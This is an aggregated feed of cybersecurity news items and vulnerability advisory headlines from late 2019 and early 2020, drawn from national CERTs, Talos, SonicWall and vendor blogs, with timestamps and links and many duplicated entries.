On Tuesday, the NSA announced they had found a critical vulnerability in the certificate validation functionality on Windows 10 and Windows Server 2016/2019. This bug allows attackers to break the validation of trust in a wide variety of contexts, such as HTTPS and code signing. Concerned? Get the important details and see if you’re vulnerable […]

https://blog.trailofbits.com/2020/01/16/exploiting-the-windows-cryptoapi-vulnerability/
Foxit PDF Reader Javascript createTemplate Invalid Page Code Execution Vulnerability
2020-01-16T00:00:00Z | 1579132800

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0935
Foxit PDF Reader JavaScript field keystroke action remote code execution vulnerability
2020-01-16T00:00:00Z | 1579132800

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0934
Foxit PDF Reader Javascript Field Action Validate Remote Code Execution Vulnerability
2020-01-16T00:00:00Z | 1579132800

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0915
Foxit PDF Reader JavaScript field action OnBlur remote code execution vulnerability
2020-01-16T00:00:00Z | 1579132800

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0920
Virtual Desktop Infrastructure (VDI) ? Risks and Solutions
2020-01-15T17:52:00Z | 1579110720

Leverage the benefits of VDI without opening yourself to security risk. Guardicore provides user access management and microsegmentation for Citrix.

https://www.akamai.com/blog/security/virtual-desktop-infrastructure-vdi-risks-and-solutions
Vulnerability in Citrix ADC actively exploited
2020-01-15T10:54:10Z | 1579085650

The vulnerability CVE-20191-19781 in Citrix ADC VPN gateway is actively exploited. As a fix is not yet available, users are encouraged to adopt restrictive methods immediately and to follow the log data in case of intrusion attempts.

https://www.kyberturvallisuuskeskus.fi/en/news/vulnerability-citrix-adc-actively-exploited
Vulnerability in Citrix ADC actively exploited
2020-01-15T10:54:10Z | 1579085650

The vulnerability CVE-20191-19781 in Citrix ADC VPN gateway is actively exploited. As a fix is not yet available, users are encouraged to adopt restrictive methods immediately and to follow the log data in case of intrusion attempts.

https://www.kyberturvallisuuskeskus.fi/en/news/vulnerability-citrix-adc-actively-exploited
Cyber exercise scenarios 2020 to support exercise planning
2020-01-15T10:44:34Z | 1579085074

Has your organisation decided to improve its cyber security through exercises for cyber crisis? Do you need ideas for exercise scenarios? We can help you. Our new book Kyberharjoitusskenaariot 2020 contains 20 different scenarios that are based on real-life events. See also our cyber exercise guide from last year.

https://www.kyberturvallisuuskeskus.fi/en/news/cyber-exercise-scenarios-2020-support-exercise-planning
Cyber exercise scenarios 2020 to support exercise planning
2020-01-15T10:44:34Z | 1579085074

Has your organisation decided to improve its cyber security through exercises for cyber crisis? Do you need ideas for exercise scenarios? We can help you. Our new book Kyberharjoitusskenaariot 2020 contains 20 different scenarios that are based on real-life events. See also our cyber exercise guide from last year.

https://www.kyberturvallisuuskeskus.fi/en/news/cyber-exercise-scenarios-2020-support-exercise-planning
Mere discussion does not fix vulnerabilities in our society
2020-01-15T10:38:04Z | 1579084684

In our first Information security now! article in 2020 our Deputy Director-General Jarkko Saarimäki goes through the most important cyber events last year and says goodbye to executive duties at the NCSC-FI. This refers to the editorial article in our publication Information security in 2019, which will be published first in Finnish at the beginning of February.

https://www.kyberturvallisuuskeskus.fi/en/news/mere-discussion-does-not-fix-vulnerabilities-our-society
Mere discussion does not fix vulnerabilities in our society
2020-01-15T10:38:04Z | 1579084684

In our first Information security now! article in 2020 our Deputy Director-General Jarkko Saarimäki goes through the most important cyber events last year and says goodbye to executive duties at the NCSC-FI. This refers to the editorial article in our publication Information security in 2019, which will be published first in Finnish at the beginning of February.

https://www.kyberturvallisuuskeskus.fi/en/news/mere-discussion-does-not-fix-vulnerabilities-our-society
High Threat Security Alert (A20-01-03): Multiple Vulnerabilities in Microsoft Products (January 2020)
2020-01-15T04:00:00Z | 1579060800

Microsoft has released security updates addressing multiple vulnerabilities which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A20-01-04): Multiple Vulnerabilities in Oracle Java and Oracle Products (January 2020)
2020-01-15T04:00:00Z | 1579060800

Oracle has released Critical Patch Update (CPU) Advisory with collections of patches for multiple security vulnerabilities found in Java SE and various Oracle products.

https://www.govcert.gov.hk/en/alerts_detail.php
HTTP Cache Poisoning Advisory
2020-01-13T05:00:00Z | 1578891600

Summary On January 14, 2020, CERT CC published an advisory warning of the potential use of Content Delivery Networks (CDNs) to cache malicious traffic. Akamai acknowledges this issue and has been aware of similar research in the past. This advisory...

https://www.akamai.com/blog/security/http-cache-poisoning-advisory
High Threat Security Alert (A20-01-02): Vulnerability in Citrix Application Delivery Controller and Citrix Gateway
2020-01-13T04:00:00Z | 1578888000

A vulnerability has been found in Citrix ADC and Citrix Gateway.

https://www.govcert.gov.hk/en/alerts_detail.php
SD-WAN vs Hybrid WAN
2020-01-12T15:43:25Z | 1578843805

Most enterprise WANs have historically used MPLS, but with the proliferation of cloud resources and mobile users, organizations are realizing the need to facilitate more flexible connectivity. They are faced with many options when making this decision, but one of the first that must be considered is whether to go with a hybrid WAN or... The post SD-WAN vs Hybrid WAN appeared first on Cato Networks.

https://www.catonetworks.com/blog/sd-wan-vs-hybrid-wan/
Streaming and Security: In Conversation With Smita Aeron
2020-01-11T05:00:00Z | 1578718800

People from around the globe are looking for instant and uninterrupted access to streaming services, on any device and in any location. But delivering high-quality streams that can easily scale to meet audience demand is no easy task. To better...

https://www.akamai.com/blog/culture/streaming-and-security-in-conversation-with-smita-aeron
International teams competed on innovation challenges for the EU's Galileo satellite positioning services in Helsinki
2020-01-09T15:40:10Z | 1578584410

Harvest a pumpkin, play in a labyrinth or identify an interference in the satellite navigation signal. These ideas won the Galileo Innovation Challenges.

https://www.kyberturvallisuuskeskus.fi/en/news/international-teams-competed-innovation-challenges-eus-galileo-satellite-positioning-services
International teams competed on innovation challenges for the EU's Galileo satellite positioning services in Helsinki
2020-01-09T15:40:10Z | 1578584410

Harvest a pumpkin, play in a labyrinth or identify an interference in the satellite navigation signal. These ideas won the Galileo Innovation Challenges.

https://www.kyberturvallisuuskeskus.fi/en/news/international-teams-competed-innovation-challenges-eus-galileo-satellite-positioning-services
Is SASE the future of SD-WAN and Network Security?
2020-01-09T11:01:45Z | 1578567705

The post Is SASE the future of SD-WAN and Network Security? appeared first on Cato Networks.

https://go.catonetworks.com/VOD-REG-Gartner-SASE.html
High Threat Security Alert (A20-01-01): Multiple Vulnerabilities in Firefox
2020-01-08T04:00:00Z | 1578456000

Mozilla has published two security advisories (MFSA 2020-01 and MFSA 2020-02) to address multiple browser vulnerabilities. Reports indicate that active exploitation against the vulnerability has been observed.

https://www.govcert.gov.hk/en/alerts_detail.php
E2fsprogs e2fsck rehash.c mutate_name() Code Execution Vulnerability
2020-01-07T00:00:00Z | 1578355200

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0973
RIA ja SMITi koostöös muutub riigivõrk töökindlamaks
2020-01-06T13:18:01Z | 1578316681

Riigi Infosüsteemi Amet (RIA) ja Siseministeeriumi infotehnoloogia- ja arenduskeskus (SMIT) sõlmisid novembris leppe, mille alusel saab RIA kasutada SMITi tehnikute abi kõikjal Eestis.

https://ria.ee/uudised/ria-ja-smiti-koostoos-muutub-riigivork-tookindlamaks
RIA peadirektori asetäitjaks sai Margus Arm
2020-01-03T13:24:28Z | 1578057868

Margus Arm töötab RIAs 2016. aasta sügisest ning tal on pikaajaline kogemus Eesti e-riigi lahendustega. Ta kaasati 2002. aastal ID-kaardi kasutusele võtmisesse ning on sellest saati olnud seotud Eesti e-teenuste arendamise ja töös hoidmisega. Arm oli 2017. aastal toimunud ID-kaardi kriisi lahendamise üks juhtfiguure.

https://ria.ee/uudised/ria-peadirektori-asetaitjaks-sai-margus-arm
Over one thousand unprotected automation equipment in Finnish networks
2020-01-03T09:23:26Z | 1578043406

The NCSC-FI at Traficom studies annually unprotected automation equipment in Finnish networks. The study in 2019 revealed just over one thousand unprotected automation equipment.

https://www.kyberturvallisuuskeskus.fi/en/news/over-one-thousand-unprotected-automation-equipment-finnish-networks
Over one thousand unprotected automation equipment in Finnish networks
2020-01-03T09:23:26Z | 1578043406

The NCSC-FI at Traficom studies annually unprotected automation equipment in Finnish networks. The study in 2019 revealed just over one thousand unprotected automation equipment.

https://www.kyberturvallisuuskeskus.fi/en/news/over-one-thousand-unprotected-automation-equipment-finnish-networks
Help for choosing and understanding information security instructions
2020-01-03T09:19:36Z | 1578043176

Our new report Luottamuksen lähteillä (From trustworthy sources) contains information on the development of information security, standardisation and certification, as well as on their current and future state. The report is designed as background material for organisations and experts seeking suitable standards for use as well as for their development work.

https://www.kyberturvallisuuskeskus.fi/en/news/help-choosing-and-understanding-information-security-instructions
Help for choosing and understanding information security instructions
2020-01-03T09:19:36Z | 1578043176

Our new report Luottamuksen lähteillä (From trustworthy sources) contains information on the development of information security, standardisation and certification, as well as on their current and future state. The report is designed as background material for organisations and experts seeking suitable standards for use as well as for their development work.

https://www.kyberturvallisuuskeskus.fi/en/news/help-choosing-and-understanding-information-security-instructions
Guidance for secure use of cloud services on our website
2020-01-02T10:36:43Z | 1577961403

Our Criteria to Assess the Information Security of Cloud Services (PiTuKri) have raised a lot of interest both at national and international level. The Criteria are mainly aimed at government organisations and are now available in English on our website. We have also published guidelines for secure use of cloud services for private individuals and for small organisations and enterprises.

https://www.kyberturvallisuuskeskus.fi/en/news/guidance-secure-use-cloud-services-our-website
Guidance for secure use of cloud services on our website
2020-01-02T10:36:43Z | 1577961403

Our Criteria to Assess the Information Security of Cloud Services (PiTuKri) have raised a lot of interest both at national and international level. The Criteria are mainly aimed at government organisations and are now available in English on our website. We have also published guidelines for secure use of cloud services for private individuals and for small organisations and enterprises.

https://www.kyberturvallisuuskeskus.fi/en/news/guidance-secure-use-cloud-services-our-website
The use of DNSSEC leaped forward in Finland: Using digital services becoming more secure
2020-01-02T10:26:25Z | 1577960785

The number of registrars providing DNSSEC (Domain Name System Security Extensions) has increased from under ten to over 250 registrars at the end of 2019. At the same time, the validation grade for ensuring genuine websites and senders of e-mail has risen to 90 per cent of the Finnish internet traffic. In terms of DNSSEC validation grades, Finland ranks now among the best countries in the world. Traficom provides DNSSEC to the Finnish registrars free of charge.

https://www.kyberturvallisuuskeskus.fi/en/news/use-dnssec-leaped-forward-finland-using-digital-services-becoming-more-secure
The use of DNSSEC leaped forward in Finland: Using digital services becoming more secure
2020-01-02T10:26:25Z | 1577960785

The number of registrars providing DNSSEC (Domain Name System Security Extensions) has increased from under ten to over 250 registrars at the end of 2019. At the same time, the validation grade for ensuring genuine websites and senders of e-mail has risen to 90 per cent of the Finnish internet traffic. In terms of DNSSEC validation grades, Finland ranks now among the best countries in the world. Traficom provides DNSSEC to the Finnish registrars free of charge.

https://www.kyberturvallisuuskeskus.fi/en/news/use-dnssec-leaped-forward-finland-using-digital-services-becoming-more-secure
OpenCV JSON persistence parser buffer overflow vulnerability
2020-01-02T00:00:00Z | 1577923200

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0853
OpenCV XML Persistence Parser Buffer Overflow Vulnerability
2020-01-02T00:00:00Z | 1577923200

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0852
RIA peadirektori asetäitja Andrus Kaarelson naaseb erasektorisse
2019-12-31T10:29:07Z | 1577788147

Riigi Infosüsteemi Ameti (RIA) riigi infosüsteemi teenistuse juht Andrus Kaarelson lahkub selle aasta lõpus RIAst ning läheb tagasi tööle erasektorisse.

https://ria.ee/uudised/ria-peadirektori-asetaitja-andrus-kaarelson-naaseb-erasektorisse
SonicOS and SonicOSv Read-only Admin Can Elevate to Config Mode
2019-12-30T20:00:00Z | 1577736000

A vulnerability in SonicOS allow authenticated read-only admin can elevate permissions to configuration mode. This vulnerability affected SonicOS Gen 5 version 5.9.1.12-4o and earlier, Gen 6 version 6.2.7.4-32n, 6.5.1.4-4n, 6.5.2.3-4n, 6.5.3.3-3n, 6.2.7.10-3n, 6.4.1.0-3n, 6.5.3.3-3n, 6.5.1.9-4n and SonicOSv 6.5.0.2-8v_RC363 (VMWARE), 6.5.0.2.8v_RC367 (AZURE), SonicOSv 6.5.0.2.8v_RC368 (AWS), SonicOSv 6.5.0.2.8v_RC366 (HYPER_V). CVE: CVE-2019-7479 Last updated: Dec. 30, 2019, 8 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2019-0012
Global Management System (GMS) Unauthorized User SQL Injection
2019-12-30T20:00:00Z | 1577736000

A vulnerability in GMS allow unauthenticated user to SQL injection in Webservice module. This vulnerability affected GMS versions 8.4, 8.5, 8.6, 8.7, 9.0 and 9.1. CVE: CVE-2019-7478 Last updated: Dec. 30, 2019, 8 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2019-0011
Unstuck in the middle: WAN Latency, packet loss, and the wide, wide world of Internet WAN
2019-12-29T12:11:33Z | 1577621493

One of the big selling points of SD-WAN tools is their ability to use the Internet to deliver private-WAN levels of performance and reliability. Give each site connections to two or three Internet providers and you can run even demanding, performance-sensitive applications with confidence. Hence the amount of MPLS going away in the wake of... The post Unstuck in the middle: WAN Latency, packet loss, and the wide, wide world of Internet WAN appeared first on Cato Networks.

https://www.catonetworks.com/blog/unstuck-in-the-middle-wan-latency-packet-loss-and-the-wide-wide-world-of-internet-wan/
Já se encontra disponível o Relatório 2019 da Linha de Observação Sociedade
2019-12-27T00:00:00Z | 1577404800

Este documento incide sobre os aspetos sociais da cibersegurança, isto é, como os cidadãos em geral pensam e agem neste domínio. Utiliza diversas fontes reconhecidas, tais como o Eurobarómetro, o Eurostat, o Instituto Nacional de Estatística ou a Direção-Geral de Estatísticas da Educação e Ciência. Privilegiando os dados mais recentes, bem como aqueles que permitem leituras em linha temporal, este Relatório tem como objetivo informar a comunidade sobre esta componente, de modo a contribuir para a construção de estratégias de educação e sensibilização eficazes e políticas públicas conscientes. Trata-se do primeiro Relatório setorial, de vários a serem lançados pelo Observatório de Cibersegurança, pretendendo-se cobrir as seis Linhas de Observação definidas (Riscos & Conflitos, Economia, Sociedade, Ética & Direito, Políticas Públicas e Inovação & Tecnologias Futuras).Pode aceder ao documento aqui. Recorde-se que o Observatório de Cibersegurança foi criado em 2019 pelo Centro Nacional de Cibersegurança com o objetivo de promover a partilha de conhecimento multidisciplinar sobre a cibersegurança em Portugal. Desta forma, foi construído em articulação com a comunidade, nomeadamente diversas partes interessadas e representantes académicos das áreas em causa. Para conhecer melhor este projeto, consulte a seguinte página.Atualizações ao documento:1ª - 02/01/20202ª - 16/01/2020

https://dyn.cncs.gov.pt/pt/detalhe/art/572/ja-se-encontra-disponivel-o-relatorio-2019-da-linha-de-observacao-sociedade
Network Optimization Techniques for the Modern WAN
2019-12-24T13:37:07Z | 1577194627

A recent conversation with a WAN engineer got me thinking about how network optimization techniques have changed over the years. Optimization has always been about overcoming latency, jitter, packet loss, and bandwidth limitations. However, in recent years bandwidth has become much less of an issue for most enterprises. Lower dollar-per-bit costs of bandwidth and apps... The post Network Optimization Techniques for the Modern WAN appeared first on Cato Networks.

https://www.catonetworks.com/blog/network-optimization-techniques-for-the-modern-wan/
Email Security Unauthenticated Remote Code Execution
2019-12-23T20:00:00Z | 1577131200

A vulnerability in SonicWall Email Security appliance allow an unauthenticated user to perform remote code execution. This vulnerability affected Email Security Appliance version 10.0.2 and earlier. CVE: CVE-2019-7489 Last updated: Dec. 23, 2019, 8 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2019-0023
Email Security Weak Default Credential
2019-12-23T20:00:00Z | 1577131200

Weak default password cause vulnerability in SonicWall Email Security appliance which leads to attacker gain access to appliance database. This vulnerability affected Email Security Appliance up to 10.0.2, 9.2.3 and earlier. CVE: CVE-2019-7488 Last updated: Dec. 23, 2019, 8 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2019-0014
Cybersecurity label brought some sunshine into otherwise grey cyber weather in November
2019-12-20T11:09:31Z | 1576840171

The large volume of data leaks turned cyber weather grey and gloomy in November. The high frequency of leaks is mainly possible because users do not update their devices. Malware accessed the networks of different organisations via email attachments also in Finland, but we managed to avoid the ransomware plaguing organisations abroad. Scams, on the other hand, are as common as usual in Finland. Scam messages are sent by email and text messages. The Cybersecurity label published in November helps consumers make informed decisions when buying smart devices.

https://www.kyberturvallisuuskeskus.fi/en/news/cybersecurity-label-brought-some-sunshine-otherwise-grey-cyber-weather-november
Cybersecurity label brought some sunshine into otherwise grey cyber weather in November
2019-12-20T11:09:31Z | 1576840171

The large volume of data leaks turned cyber weather grey and gloomy in November. The high frequency of leaks is mainly possible because users do not update their devices. Malware accessed the networks of different organisations via email attachments also in Finland, but we managed to avoid the ransomware plaguing organisations abroad. Scams, on the other hand, are as common as usual in Finland. Scam messages are sent by email and text messages. The Cybersecurity label published in November helps consumers make informed decisions when buying smart devices.

https://www.kyberturvallisuuskeskus.fi/en/news/cybersecurity-label-brought-some-sunshine-otherwise-grey-cyber-weather-november
Security Alert (A19-12-06): Multiple Vulnerabilities in Drupal
2019-12-19T04:00:00Z | 1576728000

Drupal released security updates to fix vulnerabilities resided in the Drupal Core and its modules.

https://www.govcert.gov.hk/en/alerts_detail.php
Curso online Bullying e Ciberbullying: Prevenir & Agir está disponível em janeiro
2019-12-19T00:00:00Z | 1576713600

O objetivo passa por sensibilizar os participantes para a problemática do bullying e do ciberbullying, de forma a dar oportunidade aos interessados para aprofundar conhecimentos e desenvolver competências que os permitam identificar, prevenir, e intervir face a estes comportamentos. O MOOC está estruturado em quatro módulos e incide em temáticas como: bullying, ciberbullying e a comunicação através do ecrã, segurança na internet e ciberbullying, abordagens de intervenção face ao bullying e ciberbullying. O curso, que se enquadra nas propostas de formação do plano nacional Escola Sem Bullying. Escola Sem Violência, destina-se a professores, educadores, pais/encarregados de educação, psicólogos, forças de segurança, outros profissionais que desempenhem funções em contextos educativos, mas também a todos os interessados sobre esta temática. Recorde-se formação ter obtenção de um Certificado de Conclusão do Curso e pode inscrever-se aqui.

https://dyn.cncs.gov.pt/pt/detalhe/art/571/curso-online-bullying-e-ciberbullying-prevenir-agir-esta-disponivel-em-janeiro
FIRST released ethics guidelines to deepen trust among incident response teams
2019-12-19T00:00:00Z | 1576713600

Calling for public consultation until end of January, 2020

https://www.first.org/newsroom/releases/20191219
SonicOS SSLVPN NACAgent 3.5 windows binary is vulnerable to Unquoted Service Path Privilege Escalation vulnerability
2019-12-18T22:11:32Z | 1576707092

Installation of the SonicOS SSLVPN NACagent 3.5 on the Windows operating system, an autorun value is created does not put the path in quotes, so if a malicious binary by an attacker within the parent path could allow code execution. CVE: CVE-2019-7487 Last updated: Dec. 18, 2019, 10:11 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2019-0022
SonicWall SMA100 Authenticated Code injection
2019-12-18T20:16:13Z | 1576700173

Code injection in SonicWall SMA100 allows an authenticated user to execute arbitrary code in viewcacert CGI script. This vulnerability impacted SMA100 version 9.0.0.4 and earlier. CVE: CVE-2019-7486 Last updated: March 6, 2020, 5:42 a.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2019-0021
SonicWall SMA100 Authenticated Buffer Overflow
2019-12-18T19:42:49Z | 1576698169

Buffer overflow in SonicWall SMA100 allows an authenticated user to execute arbitrary code in DEARegister CGI script. This vulnerability impacted SMA100 version 9.0.0.3 and earlier. CVE: CVE-2019-7485 Last updated: March 6, 2020, 4:42 a.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2019-0020
SonicWall SMA100 Authenticated SQL injection
2019-12-17T22:00:00Z | 1576620000

Authenticated SQL Injection in SonicWall SMA100 allow user to gain read-only access to unauthorized resources using viewcacert CGI script. This vulnerability impacted SMA100 version 9.0.0.3 and earlier. CVE: CVE-2019-7484 Last updated: March 6, 2020, 4:42 a.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2019-0019
SonicWall SMA100 Pre-authentication directory traversal
2019-12-17T21:00:00Z | 1576616400

In SonicWall SMA100, an unauthenticated Directory Traversal vulnerability in the handleWAFRedirect CGI allows the user to test for the presence of a file on the server. CVE: CVE-2019-7483 Last updated: March 6, 2020, 4:42 a.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2019-0018
SonicWall SMA100 Pre-authentication stack buffer overflow
2019-12-17T21:00:00Z | 1576616400

Stack-based buffer overflow in SonicWall SMA100 allows an unauthenticated user to execute arbitrary code in function libSys.so. This vulnerability impacted SMA100 version 9.0.0.3 and earlier. CVE: CVE-2019-7482 Last updated: March 6, 2020, 4:42 a.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2019-0017
SonicWall SMA100 Pre-Authentication SQL Injection
2019-12-17T20:00:00Z | 1576612800

Vulnerability in SonicWall SMA100 allow unauthenticated user to gain read-only access to unauthorized resources. This vulnerability impacted SMA100 version 9.0.0.3 and earlier. CVE: CVE-2019-7481 Last updated: March 6, 2020, 4:42 a.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2019-0016
Network & Firewall Security for the Modern Enterprise
2019-12-17T15:28:35Z | 1576596515

Edge computing and the distributed cloud both cracked Gartner’s Top 10 Strategic Technology Trends for 2020, reminding me of a recent discussion on the challenges enterprises face when securing the modern WAN. Traditional firewall security simply can’t keep up with the challenges created by these new network paradigms. As a result, when I discuss firewall... The post Network & Firewall Security for the Modern Enterprise appeared first on Cato Networks.

https://www.catonetworks.com/blog/network-firewall-security-for-the-modern-enterprise/
Windows 7 kasutajad peavad uue aasta alguses operatsioonisüsteemi uuendama
2019-12-17T08:02:05Z | 1576569725

Microsoft lõpetab 14. jaanuaril 2020 operatsioonisüsteemi Windows 7 toetamise. Kuigi Windows 7 operatsioonisüsteemiga arvutit saab edasi kasutada, soovitab Riigi Infosüsteemi Amet tarkvara kiiremas korras välja vahetada. Pärast toe lõppemist ei pruugi arvutis töötada ka DigiDoc tarkvara.

https://ria.ee/uudised/windows-7-kasutajad-peavad-uue-aasta-alguses-operatsioonisusteemi-uuendama
Information security and data protection requirements introduced for public procurements
2019-12-16T08:35:59Z | 1576485359

The life cycle of an IT system or device begins when its purchase is planned. Information security and data protection issues should be managed from the outset. This ensures efficient risk management and helps control the costs while the product is in use. The project “Kyber-terveys” focused on cyber security in healthcare and developed a list of information security and data protection requirements for public procurements in the social and healthcare sector. However, most of the criteria can be used in other sectors, too. The list has already been used in the North Ostrobothnia hospital district with very positive results.

https://www.kyberturvallisuuskeskus.fi/en/news/information-security-and-data-protection-requirements-introduced-public-procurements
Information security and data protection requirements introduced for public procurements
2019-12-16T08:35:59Z | 1576485359

The life cycle of an IT system or device begins when its purchase is planned. Information security and data protection issues should be managed from the outset. This ensures efficient risk management and helps control the costs while the product is in use. The project “Kyber-terveys” focused on cyber security in healthcare and developed a list of information security and data protection requirements for public procurements in the social and healthcare sector. However, most of the criteria can be used in other sectors, too. The list has already been used in the North Ostrobothnia hospital district with very positive results.

https://www.kyberturvallisuuskeskus.fi/en/news/information-security-and-data-protection-requirements-introduced-public-procurements
WAGO PFC200 iocheckd service "I/O-Check" factory restore denial-of-service vulnerability
2019-12-16T00:00:00Z | 1576454400

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0872
WAGO PFC200 iocheckd service "I/O-Check" MAC Address overwrite Denial of Service Vulnerability
2019-12-16T00:00:00Z | 1576454400

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0869
WAGO PFC200 iocheckd service "I/O-Check" ReadPCBManuNum remote code execution vulnerability
2019-12-16T00:00:00Z | 1576454400

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0873
WAGO PFC200 iocheckd service "I/O-Check" ReadPSN remote code execution vulnerability
2019-12-16T00:00:00Z | 1576454400

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0871
WAGO PFC200 iocheckd service "I/O-Check" BC_ProductLabel remote code execution vulnerability
2019-12-16T00:00:00Z | 1576454400

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0863
WAGO PFC200 iocheckd service "I/O-Check" ReadPCBManuNum remote code execution vulnerability
2019-12-16T00:00:00Z | 1576454400

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0874
WAGO PFC200 iocheckd service "I/O-Check" get_coupler_details remote code execution vulnerability
2019-12-16T00:00:00Z | 1576454400

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0864
WAGO PFC200 iocheckd service "I/O-Check" external tool information exposure vulnerability
2019-12-16T00:00:00Z | 1576454400

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0862
WAGO PFC200 iocheckd service "I/O-Check" Erase Denial of Service Vulnerability
2019-12-16T00:00:00Z | 1576454400

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0870
70 top hackers from around the world gathered to Finland – The world’s first open 5G Cyber Security Hackathon was a success
2019-12-12T14:55:17Z | 1576162517

On Friday the 29th of November top hackers from all over the world gathered to Oulu, Finland to test their skills against 5G and cybersecurity during the weekend. Oulu, located near the Arctic Circle, is known as a global 5G and 6G hotspot and is the home to research and development of top-tier cybersecurity.

https://www.kyberturvallisuuskeskus.fi/en/news/70-top-hackers-around-world-gathered-finland-worlds-first-open-5g-cyber-security-hackathon-was
70 top hackers from around the world gathered to Finland – The world’s first open 5G Cyber Security Hackathon was a success
2019-12-12T14:55:17Z | 1576162517

On Friday the 29th of November top hackers from all over the world gathered to Oulu, Finland to test their skills against 5G and cybersecurity during the weekend. Oulu, located near the Arctic Circle, is known as a global 5G and 6G hotspot and is the home to research and development of top-tier cybersecurity.

https://www.kyberturvallisuuskeskus.fi/en/news/70-top-hackers-around-world-gathered-finland-worlds-first-open-5g-cyber-security-hackathon-was
High Threat Security Alert (A19-12-03): Multiple Vulnerabilities in Microsoft Products (December 2019)
2019-12-11T04:00:00Z | 1576036800

Microsoft has released security updates addressing multiple vulnerabilities which affect several Microsoft products or components. Reports indicate that active exploitation against the vulnerability in Microsoft Windows and Windows Server for privilege escalation have been observed.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A19-12-04): Multiple Vulnerabilities in Adobe Reader/Acrobat
2019-12-11T04:00:00Z | 1576036800

Security updates are released for Adobe Reader and Acrobat to address multiple vulnerabilities.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A19-12-05): Multiple Vulnerabilities in Apple iOS and iPadOS
2019-12-11T04:00:00Z | 1576036800

Apple has released iOS 12.4.4, iOS 13.3 and iPadOS 13.3 to fix multiple security vulnerabilities in various Apple devices.

https://www.govcert.gov.hk/en/alerts_detail.php
W1.fi hostapd deauthentication denial-of-service vulnerability
2019-12-11T00:00:00Z | 1576022400

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0850
Linux kernel CAM table denial-of-service vulnerability
2019-12-11T00:00:00Z | 1576022400

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0900
W1.fi hostapd CAM table denial-of-service vulnerability
2019-12-11T00:00:00Z | 1576022400

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0849
Kakadu Software SDK ATK marker code execution vulnerability
2019-12-11T00:00:00Z | 1576022400

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0933
Apple Safari SVG Marker Element baseVal Remote Code Execution Vulnerability
2019-12-11T00:00:00Z | 1576022400

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0943
LEADTOOLS JPEG2000 Isot parsing Memory Corruption Vulnerability
2019-12-10T00:00:00Z | 1575936000

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0945
Microsoft Remote Desktop Services (RDP7) Windows XP Multiple Information Leak Vulnerabilities
2019-12-10T00:00:00Z | 1575936000

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0895
Adobe Acrobat Reader DC Javascript gotoNamedDest information leak vulnerability
2019-12-10T00:00:00Z | 1575936000

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0947
Microsoft Remote Desktop Services (RDP8) license negotiation denial-of-service vulnerability
2019-12-10T00:00:00Z | 1575936000

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0901
LEADTOOLS libltdic.so DICOM receive code execution vulnerability
2019-12-10T00:00:00Z | 1575936000

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0877
LEADTOOLS libltdic.so DICOM LDicomNet::receive information disclosure vulnerability
2019-12-10T00:00:00Z | 1575936000

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0882
LEADTOOLS DICOM UI Parsing Code Execution Vulnerability
2019-12-10T00:00:00Z | 1575936000

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0884
LEADTOOLS libltdic.so DICOM LDicomNet::SendData Code Execution Vulnerability
2019-12-10T00:00:00Z | 1575936000

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0885
LEADTOOLS libltdic.so LDicomAssociate::SetBinary denial-of-service vulnerability
2019-12-10T00:00:00Z | 1575936000

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0883
Mainnet360: joint economic and security reviews with Prysm Group
2019-12-09T12:00:52Z | 1575892852

On Monday, October 28th at the Crypto Economics Security Conference, Trail of Bits announced a new joint offering with Prysm Group: Mainnet360. Carefully designed to produce a comprehensive assessment of the security and economic elements of blockchain software, Mainnet360 gives teams a broader perspective that will allow them to build safer and more resilient systems. […]

https://blog.trailofbits.com/2019/12/09/introducing-mainnet360-a-joint-economic-and-security-assessment-with-prysm-group/
Spike in malware observations helped find over 100,000 devices infected by QSnatch across the world
2019-12-09T09:52:28Z | 1575885148

How can individual Autoreporter observations help track globally significant malware? We have previously released information on how QSnatch works and how users can clean infected devices. Now we will tell you how we first detected the malware. QSnatch has attracted attention from Europe to Asia: at least 100,000 QSnatch infections have been detected across the world.

https://www.kyberturvallisuuskeskus.fi/en/news/spike-malware-observations-helped-find-over-100000-devices-infected-qsnatch-across-world
Spike in malware observations helped find over 100,000 devices infected by QSnatch across the world
2019-12-09T09:52:28Z | 1575885148

